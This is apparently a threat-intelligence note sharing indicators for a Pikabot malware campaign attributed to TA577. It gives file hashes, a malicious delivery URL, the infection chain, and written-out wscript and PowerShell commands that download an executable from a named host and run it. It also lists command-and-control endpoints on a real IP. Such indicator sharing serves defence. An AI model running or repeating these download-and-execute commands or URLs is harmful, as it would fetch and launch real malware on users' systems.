08.02.2024 | Pikabot | TA577 | 1.1.17-ghost

*************************************************

.url https://entrevientos.com.ar/ccq/
.zip 2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b
.dll ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d

*************************************************

url > zip > js > powershell > .dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\Opc.js

powershell.exe Invoke-WebRequest https://gloverstech.com/tJWz9/0.765330512761959.dat -OutFile C:\Users\Public\Jrdhtjydhjf.exe; saps C:\Users\Public\Jrdhtjydhjf.exe

powershell.exe Invoke-WebRequest 0.7206831031999564.dat -OutFile C:\Users\Public\Jrdhtjydhjf.exe; saps C:\Users\Public\Jrdhtjydhjf.exe

C:\Users\Admin\AppData\Local\Temp\Jrdhtjydhjf.exe

ctfmon.exe -p 1234

*************************************************

**** .dll distro ****

https://gloverstech.com/tJWz9/0.765330512761959.dat

*************************************************

c2's

https://158.220.80.167:2967/api/admin.emoji.add
https://158.220.80.167:2967/api/admin.teams.settings.setIcon
https://158.220.80.167:2967/api/admin.teams.admins.list
https://158.220.80.167:2967/api/admin.conversations.restrictAccess.removeGroup
https://158.220.80.167:2967/api/admin.inviteRequests.approved.list
https://158.220.80.167:2967/api/admin.emoji.add



*************************************************